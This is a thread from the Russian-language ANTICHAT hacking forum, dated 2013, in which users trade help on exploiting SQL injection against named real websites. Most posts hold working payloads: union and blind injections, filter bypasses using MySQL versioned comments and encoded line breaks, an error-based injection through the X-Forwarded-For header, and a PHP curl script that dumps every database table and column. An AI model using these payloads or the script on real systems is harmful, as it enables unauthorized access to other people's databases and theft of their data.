ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.09.2013, 16:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от o3
o3 said:
что с этой скулей не так?
__http://www.fuelthebrain.com/mini-books/print.php?bookID=1329876958' order by 11%23
.
(в Вашем случае фильтруются union и select)
Крутите,как слепую:
Сообщение от None
http://www.fuelthebrain.com/mini-books/print.php?bookID=1329876958
'+and+substr(version(),1,1)=5 and '1'='1
|
|
|
|
18.09.2013, 17:04
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от YaBtr
YaBtr said:
Крутите,как слепую:
Легче крутить с использованием вывода, второе и третье поля принтабельны:
Код:
Code:
1329876958'+/*!%0Dunion%0Dselect%0D*FROM(select 1) a1 join (select version()) a2 join (select 3) a3 join (select 4) a4 join (select 5) a5 join (select 6) a6 join (select 7) a7 join (select 8) a8 join (select 9) a9 join (select 10) a10 join (select 11) a11*/+--+
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]Используем комментарий для обхода одного фильтра[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#FF8000"]/*!КОД*/
[/COLOR][COLOR="#0000BB"]Символ переноса для второго[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#FF8000"]/*!%0Dunion%0Dselect%0D*/
[/COLOR][COLOR="#0000BB"]И для третьего фильтра создаем собственную таблицу через подзапросы[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]псевдонимы и join[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#FF8000"]/*!%0Dunion%0Dselect%0D*FROM(select 1) a1 join (select version()) a2 join (select 3) a3 join (select 4) a4 join (select 5) a5 join (select 6) a6 join (select 7) a7 join (select 8) a8 join (select 9) a9 join (select 10) a10 join (select 11) a11*/
[/COLOR][/COLOR]
|
|
|
19.09.2013, 10:43
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от Always
Always said:
http://site.ru/works/247964/
Host: obshelit.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
x-forwarded-for:1"/**/and/**/(select/**/1/**/from/**/(select/**/(count(*)),concat((select/**/count(*)/**/from/**/information_schema.tables/**/limit/**/50,1),0x00,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by(x))/**/a)/**/or/**/"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://site.ru/works/248095/
Начинаю перебирать лимит, все перестает отображаться...в чем проблема?
Вы что, в count(*) лимит перебираете? Работает, пример вывода таблиц с колонками:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#DD0000"]"http://site.ru/works/247964/"[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#0000BB"]CURLOPT_RETURNTRANSFER[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]True[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#0000BB"]CURLOPT_ENCODING[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'gzip, deflate'[/COLOR][COLOR="#007700"],
));
for ([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]+=[/COLOR][COLOR="#0000BB"]64[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#FF8000"]//$main = 'version()';
[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'MID(CONCAT(@p:=0x20,(SELECT COUNT(*) FROM information_schema.columns WHERE TABLE_SCHEMA !=0x696e666f726d6174696f6e5f736368656d61 and @p:= CONCAT(@p,0x3B, TABLE_SCHEMA,0x3A,TABLE_NAME, 0x3A,COLUMN_NAME) ),@p),5)'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'1"or 1 group by concat( mid(('[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'),'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]',64), floor(rand(0)*2)) having min(0) or 1 #'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"/**/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_HTTPHEADER[/COLOR][COLOR="#007700"], array([/COLOR][COLOR="#DD0000"]"x-forwarded-for: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Duplicate entry \''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]64[/COLOR][COLOR="#007700"]));
}
[/COLOR][COLOR="#0000BB"]curl_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Выход: Ctrl+C. Запуск в консоли.
|
|
|
|
21.09.2013, 11:07
|
|
Новичок
Регистрация: 04.01.2010
Сообщений: 24
Провел на форуме:
174204
Репутация:
24
|
|
Ошибка
Ошибка при попытке подключиться к information_schema.tables
+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,1 6+from+information_schema.tables/*
Query Failed: Can't read dir of './test/' (errno: 13)
Query:Select a.*, b.image_filename, b.image_width, b.image_height from AMJ_Article a left join AMJ_Article_Image b on (a.article_id = b.article_id and b.image_main = 1) where a.article_type = 'TRENDS' and a.article_id = 1 UNION SELECT 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16 from information_schema.tables/*
Что это значит?
версия 5.0.22
|
|
|
|
21.09.2013, 12:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от vsid55
vsid55 said:
Ошибка при попытке подключиться к information_schema.tables
+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,1 6+from+information_schema.tables/*
Query Failed: Can't read dir of './test/' (errno: 13)
Query:Select a.*, b.image_filename, b.image_width, b.image_height from AMJ_Article a left join AMJ_Article_Image b on (a.article_id = b.article_id and b.image_main = 1) where a.article_type = 'TRENDS' and a.article_id = 1 UNION SELECT 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16 from information_schema.tables/*
Что это значит?
версия 5.0.22
пишет что не может прочитать дерикторрию тест, так как не хватает прав
|
|
|
|
21.09.2013, 16:57
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
Провел на форуме:
71852
Репутация:
0
|
|
Добрый день!
при запросе:
?id=-4099+union+select+1,2,3,4,5,@@version,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33--
версия выводится замечательно, но если мы заменим @@version на version(), то откроется просто белая страница, сервер фильтрует круглые скобки, невозможно обратиться ни к одной функции из-за этого. Как можно обойти данную проблему?
|
|
|
|
22.09.2013, 02:35
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
Провел на форуме:
71852
Репутация:
0
|
|
Сообщение от OxoTnik
OxoTnik said:
захексить весь запрос
-4099+0x756E696F6E2B73656C6563742B312C322C332C342C3 52C404076657273696F6E2C372C382C392C31302C31312C313 22C31332C31342C31352C31362C31372C31382C31392C32302 C32312C32322C32332C32342C32352C32362C32372C32382C3 2392C33302C33312C33322C3333
Ничего не дало.
|
|
|
|
22.09.2013, 04:34
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Version () захекси, а не всю адресную строку.
|
|
|
|
22.09.2013, 07:47
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от cipa21
cipa21 said:
Добрый день!
при запросе:
?id=-4099+union+select+1,2,3,4,5,@@version,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33--
версия выводится замечательно, но если мы заменим @@version на version(), то откроется просто белая страница, сервер фильтрует круглые скобки, невозможно обратиться ни к одной функции из-за этого. Как можно обойти данную проблему?
Сообщение от OxoTnik
OxoTnik said:
захексить весь запрос
Сообщение от kingbeef
kingbeef said:
Version () захекси, а не всю адресную строку.
В MySQL хекс используется только для строк. Захексить функцию, или весь запрос вам не удастся.
|
|
|
|
26.09.2013, 06:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
http://np.com.ua/search.html?keywords=1'+order+by+2+--+
http://np.com.ua/search.html?keywords=1'+union+SELECT+1,2+--+
Как быть?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
